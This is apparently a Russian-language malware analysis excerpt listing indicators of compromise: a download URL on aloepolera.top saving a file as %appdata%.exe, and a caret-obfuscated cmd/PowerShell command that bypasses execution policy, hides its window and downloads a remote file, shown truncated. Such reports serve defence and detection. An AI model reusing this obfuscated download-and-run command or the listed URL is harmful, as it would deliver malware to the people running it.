Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^WeRShe^ll^.^E^x^e ^-^E^X^ECUtI^OnP^O^lIcy by^pAS^S^ -noPRO^F^Ile^ -W^InDoWSt^yl^E hId^d^eN (nEW^-oB^J^e^ct sYS^t^eM^.Net.^webC^LIENt^).^d^oW^Nl^o^a^DfILE^('http://...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "P^o^WeRShe^ll^.^E^x^e ^-^E^X^ECUtI^OnP^O^lIcy by^pAS^S^ -noPRO^F^Ile^ -W^InDoWSt^yl^E hId^d^eN (nEW^-oB^J^e^ct sYS^t^eM^.Net.^webC^LIENt^).^d^oW^Nl^o^a^DfILE^('http://...' (со скрытым окном)